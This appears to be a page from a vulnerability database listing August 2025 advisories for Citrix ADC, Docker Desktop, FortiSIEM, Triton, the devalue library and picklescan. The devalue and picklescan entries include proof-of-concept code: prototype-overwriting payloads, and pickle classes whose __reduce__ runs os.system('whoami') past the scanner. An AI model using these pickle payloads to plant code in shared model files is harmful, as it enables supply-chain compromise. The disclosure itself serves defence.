JavaScript is a high-level, interpreted programming language essential for creating interactive web applications, running directly in web browsers to enable dynamic content and user interface enhancements. It is integral to the web development stack, working seamlessly with HTML and CSS to build responsive and feature-rich websites.

JavaScript

This vulnerability has been added by Wiz to detect packages compromised by the s1ngularity campaign. For more information, visit our [advisory](https://app.wiz.io/boards/threat-center/wiz-adv-2025-084).

WMAL-2025-001

GitHub Advisory Database

Citrix ADC is an application delivery controller that analyzes application-specific traffic to distribute, optimize, and secure Layer 4-Layer 7 (L4–L7) network traffic intelligently for web applications.

Citrix ADC VPX

Citrix ADC CPX is a container-based application delivery controller that can be provisioned on a Docker host. Citrix ADC CPX enables customers to leverage Docker engine capabilities and use Citrix ADC load balancing and traffic management features for container-based applications.

Citrix ADC CPX

Memory overflow vulnerability leading to Remote Code Execution and/or Denial of Service

CVE-2025-7775

Linux

Linux Kernel

Docker Desktop is an application for MacOS and Windows machines, aimed at developers and system administrators. It enables them to build and share containerized applications and microservices. Docker Desktop includes Docker Engine, Docker CLI, Docker Compose, and is fully integrated with the machine’s filesystem and networking.

Docker Desktop

A vulnerability was identified in Docker Desktop that allows local running Linux containers to access the Docker Engine API via the configured Docker subnet, at 192.168.65.7:2375 by default. This vulnerability occurs with or without Enhanced Container Isolation (ECI) enabled, and with or without the "Expose daemon on tcp://localhost:2375 without TLS" option enabled. This can lead to execution of a wide range of privileged commands to the engine API, including controlling other containers, creating new ones, managing images etc. In some circumstances (e.g. Docker Desktop for Windows with WSL backend) it also allows mounting the host drive with the same privileges as the user running Docker Desktop.



CVE-2025-9074

Windows

Windows Cumulative Update

FortiSIEM is a comprehensive, multi-vendor security information and event management (SIEM) solution designed to provide visibility, correlation, automated response, and remediation in a single, scalable solution.

FortiSIEM

An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiSIEM version 7.3.0 through 7.3.1, 7.2.0 through 7.2.5, 7.1.0 through 7.1.7, 7.0.0 through 7.0.3 and before 6.7.9 allows an unauthenticated attacker to execute unauthorized code or commands via crafted CLI requests.

CVE-2025-25256

VulnCheck NVD++

NVIDIA Triton Inference Server, part of the NVIDIA AI platform and available with NVIDIA AI Enterprise, is open-source software that standardizes AI model deployment and execution across every workload.

Triton Inference Server

NVIDIA Triton Inference Server for Windows and Linux contains a vulnerability in the Python backend, where an attacker could cause an out-of-bounds read by sending a request. A successful exploit of this vulnerability might lead to information disclosure.

CVE-2025-23334

## 1. `devalue.parse` allows `__proto__` to be set
A string passed to `devalue.parse` could represent an object with a `__proto__` property, which would assign a prototype to an object while allowing properties to be overwritten:
```js
class Vector {
  constructor(x, y) {
    this.x = x;
    this.y = y;
  }
  get magnitude() {
    return (this.x ** 2 + this.y ** 2) ** 0.5;
  }
}
const payload = `[{"x":1,"y":2,"magnitude":3,"__proto__":4},3,4,"nope",["Vector",5],[6,7],8,9]`;
const vector = devalue.parse(payload, {
  Vector: ([x, y]) => new Vector(x, y)
});
console.log("Is vector", vector instanceof Vector); // true
console.log(vector.x) // 3
console.log(vector.y) // 4
console.log(vector.magnitude); // "nope" instead of 5
```
## 2. `devalue.parse` allows array prototype methods to be assigned to object
In a payload constructed with `devalue.stringify`, values are represented as array indices, where the array contains the 'hydrated' values:
```js
devalue.stringify({ message: 'hello' }); // [{"message":1},"hello"]
```
`devalue.parse` does not check that an index is numeric, which means that it could assign an array prototype method to a property instead:
```js
const object = devalue.parse('[{"toString":"push"}]');
object.toString(); // 0
```
This could be used by a creative attacker to bypass server-side validation.

CVE-2025-57820

Python is a high-level, general-purpose programming language. Its key feature is the high readability of the code. It supports multiple programming paradigms, including Object-Oriented Programming (OOP) and Functional Programming.

Python

### Summary
Using asyncio.unix_events._UnixSubprocessTransport._start function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to asyncio.unix_events._UnixSubprocessTransport._start function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
from asyncio.unix_events import _UnixSubprocessTransport
from types import SimpleNamespace
class EvilAsyncioUnixSubprocessTransportStart:
    def __reduce__(self):
        fake_self = SimpleNamespace(
            _loop=None,
            _protocol=None,
            _proc=None
        )
        args = "whoami"  
        return _UnixSubprocessTransport._start, (
            fake_self, args, True, None, None, None, 0
        )
```
### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
### Corresponding
https://github.com/FredericDT
https://github.com/Qhaoduoyu

GHSA-q77w-mwjj-7mqx

### Summary
Using cProfile.run function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to cProfile.run function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
import cProfile
class EvilCProfileRun:
    def __reduce__(self):
        # cProfile.run(statement) -> Profile().run(statement) -> exec(statement)
        return cProfile.run, ("__import__('os').system('whoami')",)
```
### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
### Corresponding
https://github.com/FredericDT
https://github.com/Qhaoduoyu

GHSA-49gj-c84q-6qm9

### Summary
Using doctest.debug_script function, which is a built-in python library function to execute remote pickle file.
### Details
The attack payload executes in the following steps:
First, the attacker craft the payload by calling to doctest.debug_script function in reduce method
Then when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.
### PoC
```
from doctest import debug_script
class EvilDoctestDebugScript:
    def __reduce__(self):
        # debug_script(src, pm=True) -> exec(src, ...)
        return debug_script, ("__import__('os').system('whoami')", True)
```
### Impact
Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.
What is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.
Supply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.
### Corresponding
https://github.com/FredericDT
https://github.com/Qhaoduoyu

CVE ID	Severity	Score	Technologies	Component name	CISA KEV exploit	Has fix	Published date
WMAL-2025-001	CRITICAL	N/A	JavaScript	@nx/key	No	No	Aug 27, 2025
CVE-2025-7775	CRITICAL	9.2	Citrix ADC VPX	cpe:2.3:a:citrix:netscaler_application_delivery_controller	Yes	Yes	Aug 26, 2025
CVE-2025-9074	CRITICAL	9.3	Docker Desktop	cpe:2.3:a:docker:desktop	No	Yes	Aug 20, 2025
CVE-2025-25256	CRITICAL	9.8	FortiSIEM	cpe:2.3:a:fortinet:fortisiem	No	Yes	Aug 12, 2025
CVE-2025-23334	HIGH	7.5	Triton Inference Server	cpe:2.3:a:nvidia:triton_inference_server	No	Yes	Aug 06, 2025

CVE ID	Severity	Score	Technologies	Component name	CISA KEV exploit	Has fix	Published date
WMAL-2025-001	CRITICAL	N/A	JavaScript	@nx/key	No	No	Aug 27, 2025
CVE-2025-57820	HIGH	7.9	JavaScript	devalue	No	Yes	Aug 26, 2025
GHSA-q77w-mwjj-7mqx	MEDIUM	N/A	Python	picklescan	No	Yes	Aug 26, 2025
GHSA-49gj-c84q-6qm9	MEDIUM	N/A	Python	picklescan	No	Yes	Aug 26, 2025
GHSA-fqq6-7vqf-w3fg	MEDIUM	N/A	Python	picklescan	No	Yes	Aug 26, 2025

Wiz Vulnerability Database

Explore by technology

Popular filters

High Profile

Most Recent

Vulnerabilities by the numbers

The good, the bad, and the vulnerable

Additional Wiz resources

Cloud Vulnerability DB

Cloud Threat Landscape

PEACH

Ready to see Wiz in action?